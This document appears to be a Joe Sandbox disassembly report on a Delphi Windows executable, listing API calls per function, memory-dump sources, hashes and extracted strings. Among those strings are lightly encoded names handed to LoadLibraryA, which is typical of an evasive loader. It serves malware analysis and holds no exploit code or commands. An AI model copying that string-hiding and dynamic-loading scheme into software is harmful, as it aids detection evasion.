                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID: first Window app$oloooool
                                                                  • API String ID: 716092398-2688301056
                                                                  • Opcode ID: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction ID: 6bf7e3dfdf983de485033f2134917db6cee18bc32def7ed793967fc69823b713
                                                                  • Opcode Fuzzy Hash: bf0f031763fedf2387eb07865909b2dcda5b1958d1a37e0667197b562cbda9e5
                                                                  • Instruction Fuzzy Hash: C2F0AFB2704259BFDB94DE9DDC85E9B77ECEB8C2A0B004129BA0CD7241D630ED108BB4

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 006019D0: RtlInitializeCriticalSection.KERNEL32(0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019E7
                                                                    • Part of subcall function 006019D0: RtlEnterCriticalSection.KERNEL32(0060B5C4,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 006019FA
                                                                    • Part of subcall function 006019D0: LocalAlloc.KERNEL32(00000000,00000FF8,0060B5C4,00000000,00601A98,?,?,?,006023F6), ref: 00601A24
                                                                    • Part of subcall function 006019D0: RtlLeaveCriticalSection.KERNEL32(0060B5C4,00601A9F,00000000,00601A98,?,?,?,006023F6), ref: 00601A92
                                                                  • RtlEnterCriticalSection.KERNEL32(0060B5C4,00000000,006023C8), ref: 00602275
                                                                  • RtlLeaveCriticalSection.KERNEL32(0060B5C4,006023CF), ref: 006023C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                  • String ID:
                                                                  • API String ID: 2227675388-0
                                                                  • Opcode ID: 181fc5323324d463e0b204c274c5e8fb49fba454a3ba2a41092107ee5311f17d
                                                                  • Instruction ID: 5009b1ea9114b0094a56e97b8433b4d1c1f2aca413a5a65d1e4d938f1911b195
                                                                  • Opcode Fuzzy Hash: 181fc5323324d463e0b204c274c5e8fb49fba454a3ba2a41092107ee5311f17d
                                                                  • Instruction Fuzzy Hash: 03516CB0A80206DFCB09CFA8D995A6FB7F2FF58310F28A5A9D404A7391D3349A41CF55

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0
                                                                  • Opcode ID: b19a67943c7b2b1daf05f16b5513985e7e93d5d216d3c41cae7a9180b9467bc7
                                                                  • Instruction ID: 55b83ea6f2e826010a0c4ece7eb1e404212ef759f0753011510d9abf1eba2f5f
                                                                  • Opcode Fuzzy Hash: b19a67943c7b2b1daf05f16b5513985e7e93d5d216d3c41cae7a9180b9467bc7
                                                                  • Instruction Fuzzy Hash: 2C21A1708802649FDB29AF24C4887AB7BDBAF04316F15555CE985873C2E7B48E80CB56

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0
                                                                  • Opcode ID: f325069adf687070a334fa40697b9fcd49a212d5335c7f3a9d341d9d974e8e5f
                                                                  • Instruction ID: 2f9eaafb93ec8653e51b4cd82b3db4cc76f12950b731b8b38f5c632ff51ff3d3
                                                                  • Opcode Fuzzy Hash: f325069adf687070a334fa40697b9fcd49a212d5335c7f3a9d341d9d974e8e5f
                                                                  • Instruction Fuzzy Hash: 2221D6708803A49FDB39AF2484887977BEBAF05316F15555CE585473C2E3B48DC0CB56

Control-flow Graph (function entry block 6038f0-603907; graph rendering not captured in text)
                                                                  APIs
                                                                  • FreeLibrary.KERNEL32(?,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 0060397F
                                                                  • ExitProcess.KERNEL32(00000000,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000,00000000,006028C8,?,00603A82,00608D1B,00000000), ref: 006039B7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: ExitFreeLibraryProcess
                                                                  • String ID:
                                                                  • API String ID: 1404682716-0

Control-flow Graph (function entry block 601430-60143d; graph rendering not captured in text)
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,006017C3), ref: 0060145F
                                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,006017C3), ref: 00601486
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Virtual$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 2087232378-0

Control-flow Graph (function entry block 604b70-604b7f; graph rendering not captured in text)
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID:
                                                                  • API String ID: 2948472770-0

Control-flow Graph (function entry block 604524-604532; graph rendering not captured in text)
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00604542
                                                                    • Part of subcall function 006047B8: GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000000), ref: 006047D3
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 006047F1
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 0060480F
                                                                    • Part of subcall function 006047B8: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 0060482D
                                                                    • Part of subcall function 006047B8: RegQueryValueExA.ADVAPI32 ref: 00604876
                                                                    • Part of subcall function 006047B8: RegQueryValueExA.ADVAPI32 ref: 00604894
                                                                    • Part of subcall function 006047B8: RegCloseKey.ADVAPI32(?), ref: 006048B6
                                                                  Similarity
                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                  • String ID:
                                                                  • API String ID: 2796650324-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(0000000C,00000000,00008000), ref: 00601585
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  • VirtualFree.KERNEL32(?,?,00004000), ref: 00601724
                                                                  Similarity
                                                                  • API ID: FreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 1263568516-0
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: lstrcmp
                                                                  • String ID:
                                                                  • API String ID: 1534048567-0
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,0060593C,?,00000000), ref: 006045FD
                                                                  • GetProcAddress.KERNEL32(00000000,GetLongPathNameA,kernel32.dll,0060593C,?,00000000), ref: 0060460E
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,00000000), ref: 00604642
                                                                  • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046B3
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 006046EE
                                                                  • FindFirstFileA.KERNEL32(?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 00604701
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060470E
                                                                  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C,?,00000000), ref: 0060471A
                                                                  • lstrcpyn.KERNEL32(?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060474E
                                                                  • lstrlen.KERNEL32(?,?,?,00000104,?,00000000,?,?,?,?,?,?,?,?,kernel32.dll,0060593C), ref: 0060475A
                                                                  • lstrcpyn.KERNEL32(?,?,?,?,?,?,00000104,?,00000000,?,?,?,?,?,?,?), ref: 00604783
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                  • String ID: GetLongPathNameA$\$kernel32.dll
                                                                  • API String ID: 3245196872-1565342463
                                                                  APIs
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602ED9
                                                                    • Part of subcall function 00602ED4: GetKeyboardType.USER32 ref: 00602EE5
                                                                  • GetCommandLineA.KERNEL32 ref: 00604CF7
                                                                  • GetVersion.KERNEL32 ref: 00604D0B
                                                                  • GetVersion.KERNEL32 ref: 00604D1C
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00604D58
                                                                    • Part of subcall function 00602F04: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00602F26
                                                                    • Part of subcall function 00602F04: RegQueryValueExA.ADVAPI32 ref: 00602F59
                                                                    • Part of subcall function 00602F04: RegCloseKey.ADVAPI32(?), ref: 00602F6F
                                                                  • GetThreadLocale.KERNEL32 ref: 00604D38
                                                                    • Part of subcall function 00604BC8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
                                                                  Similarity
                                                                  • API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
                                                                  • String ID:
                                                                  • API String ID: 3734044017-0
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00607CE4), ref: 00607CA6
                                                                  • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,00607CE4), ref: 00607CBF
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  APIs
                                                                  • GetDiskFreeSpaceA.KERNEL32 ref: 00605F5C
                                                                  Similarity
                                                                  • API ID: DiskFreeSpace
                                                                  • String ID:
                                                                  • API String ID: 1705453755-0
                                                                  • Opcode ID: 304410d0ac547e5d1d925de7d2a7376f39ccb66023ae0efdc727b0736b15850a
                                                                  • Instruction ID: 56b83d0a114dc4be76b8d184bf3d54b45b608cab0625a8ac54ddf8ee86293d10
                                                                  • Opcode Fuzzy Hash: 304410d0ac547e5d1d925de7d2a7376f39ccb66023ae0efdc727b0736b15850a
                                                                  • Instruction Fuzzy Hash: A31103B1E45549AFCB04CF99C9819EFBBF9EF4D300B54816AE509E7251D6319A018F90
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00604C2E), ref: 00604BEE
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 70c7e4fc98cf2963b94dc73ecb73314ef86e2f22dd4bc1e3663de0f25d4ac65e
                                                                  • Instruction ID: de02df595dd3802e8db4d01f9782a19aad22c1cb7f6af6c436d93557c2efe90b
                                                                  • Opcode Fuzzy Hash: 70c7e4fc98cf2963b94dc73ecb73314ef86e2f22dd4bc1e3663de0f25d4ac65e
                                                                  • Instruction Fuzzy Hash: 5FF0A470A44359AFEB18DF91CC42AEFB37BFB85710F408838A210A76C0EAB42A448754
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: ecbe04fde73bee193d0a7b72de749cc9874a89fd528d86f59dc676076a77a520
                                                                  • Instruction ID: 528e98083a0427f583ee3b78d34b5c1355cdf3de2a17f51a606cd5cd7331dfb5
                                                                  • Opcode Fuzzy Hash: ecbe04fde73bee193d0a7b72de749cc9874a89fd528d86f59dc676076a77a520
                                                                  • Instruction Fuzzy Hash: EAE0D8B274021427D328A9588C829F7B25DD798350F40416EBE45C73C2EEB0DEA043E8
                                                                  APIs
                                                                  • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,00607F96,00000000,006081AF,?,?,00000000,00000000), ref: 00606B3B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: InfoLocale
                                                                  • String ID:
                                                                  • API String ID: 2299586839-0
                                                                  • Opcode ID: 5cec4e5afaeaf7eaca505266971298c5afb2efbe419083297d0db2ffeb56b179
                                                                  • Instruction ID: 2538a127b28bf230c487c05fe2e7f249dc592227c9c39867c770b0dc62bb897f
                                                                  • Opcode Fuzzy Hash: 5cec4e5afaeaf7eaca505266971298c5afb2efbe419083297d0db2ffeb56b179
                                                                  • Instruction Fuzzy Hash: 52D05EA634D2503AE228515B6D85DBB9B9DCAC67A0F10403EF648C6242D2408C169371
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6decf1d1d02f52841c9f77c5de55f8057d9970dd0da59bebd052367ecff51cd
                                                                  • Instruction ID: 8e12e25e056cb71a3afc59d0f44886ba09b1843c74ae03e0eb158fe747ed93a1
                                                                  • Opcode Fuzzy Hash: b6decf1d1d02f52841c9f77c5de55f8057d9970dd0da59bebd052367ecff51cd
                                                                  • Instruction Fuzzy Hash: C6C01232525608EFD701DB8CD542D8A73FCE704550F100056E004C7611D275BE00C695
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1cfc8dc4a528fbbf25044f93a9797f47fa72584d321842d4ebb925aa7f3c2e1e
                                                                  • Instruction ID: 06c4e8a793d4ab25ad989b9b0a09be4f73708adb57caf7c1e801a34a23d219df
                                                                  • Opcode Fuzzy Hash: 1cfc8dc4a528fbbf25044f93a9797f47fa72584d321842d4ebb925aa7f3c2e1e
                                                                  • Instruction Fuzzy Hash: BAC08C3652A208EFD704CB8CE542DCAB3FCEB08620F100097F408C3700E2B5BF008A90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9c674b6cdca997e85205c1468a1f0b6fd4ed41847160108e45f4ec15252cf568
                                                                  • Instruction ID: 6c2cb4c646a9b00e64ea07d0a50451ec9922eed192b56962ea4157afcc4061d9
                                                                  • Opcode Fuzzy Hash: 9c674b6cdca997e85205c1468a1f0b6fd4ed41847160108e45f4ec15252cf568
                                                                  • Instruction Fuzzy Hash: CFB012381818C44ECA168704401179177626781710FC53080C0C147A02461849029400
                                                                  APIs
                                                                  • GetThreadLocale.KERNEL32(00000000,006081AF,?,?,00000000,00000000), ref: 00607F1A
                                                                    • Part of subcall function 00606ADC: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00606AFA
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: Locale$InfoThread
                                                                  • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                  • API String ID: 4232894706-2493093252
                                                                  • Opcode ID: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction ID: f84dacb58a5ec69ebe353e46d4ea67f2db6b91476feb507f417b75987f752d9b
                                                                  • Opcode Fuzzy Hash: 405970b93d369cb88c6105069f13510f53fd476ac40e868c890e2f5029489c8f
                                                                  • Instruction Fuzzy Hash: A46160307802499FDB48FBA4DC4169F7BABDF89300F50A478B542AB3C6CA35DE168718
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000), ref: 00609674
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: EjmgQfplvq`fB$EqffQfplvq`f$Hfqmfo01$Ol`hQfplvq`f$OlbgQfplvq`f$PjyfleQfplvq`f
                                                                  • API String ID: 1029625771-1297955608
                                                                  • Opcode ID: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction ID: 39f62e41613c841c82e5d73a37b016aa8bff7db7b0af8e5ffb24b86a5f561013
                                                                  • Opcode Fuzzy Hash: 50a1be8785d472289030787bf25c4f1d7d0ebf42d9f267e51da72cc4393963f9
                                                                  • Instruction Fuzzy Hash: CB41ED31B902185FDB88EBA4C851ADFB6BEEF48340F504439F541A73C2EA749E018BA4
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973,00000000), ref: 006038A1
                                                                  • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?), ref: 006038A7
                                                                  • GetStdHandle.KERNEL32(000000F5,006038F0,00000002,?,00000000,00000000,?,00603932,?,?,?,?,00000002,006039DE,0060292B,00602973), ref: 006038BC
                                                                  • WriteFile.KERNEL32(00000000,000000F5,006038F0,00000002,?), ref: 006038C2
                                                                  • MessageBoxA.USER32 ref: 006038E0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileHandleWrite$Message
                                                                  • String ID: Error$Runtime error at 00000000
                                                                  • API String ID: 1570097196-2970929446
                                                                  • Opcode ID: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction ID: 2124d88e66a0689c667f87b3bfccbc2f9e17d8888c3032dd70b9ee23f7f0035c
                                                                  • Opcode Fuzzy Hash: 0de637ff2df70bf3d24f60879d7482bd274cc52ed5bac0e5d9a1a20b0b58f315
                                                                  • Instruction Fuzzy Hash: 22F0B470AC439878E7386BA09D0BFAF234F9741F19F14E659B3519C2D1DBA44AC49226
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060C000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369333444.000000000060F000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_600000_25F.jbxd
                                                                  Similarity
                                                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                                                  • String ID: 8S`$P`
                                                                  • API String ID: 3990497365-1792595465
                                                                  • Opcode ID: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction ID: c8a1f16859b4dcf090157e96d894a6f6421ab70c159423d212d38e17420c788a
                                                                  • Opcode Fuzzy Hash: 89b3f9bb937295af7cd429966be731153e1d714cef756d376cb3c10833ea981d
                                                                  • Instruction Fuzzy Hash: E6410CB0A4425C9FDB69DB58CC85BDFB7BAAB44300F0440E9A608E7291D774AF848F55
                                                                  APIs
                                                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 00607064
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 00607088
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 006070A3
                                                                  • LoadStringA.USER32 ref: 00607147
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.369325894.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                  • Associated: 00000000.00000002.369323264.0000000000600000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.369328633.000000000060A000.00000004.00000001.01000000.00000003.sdmp
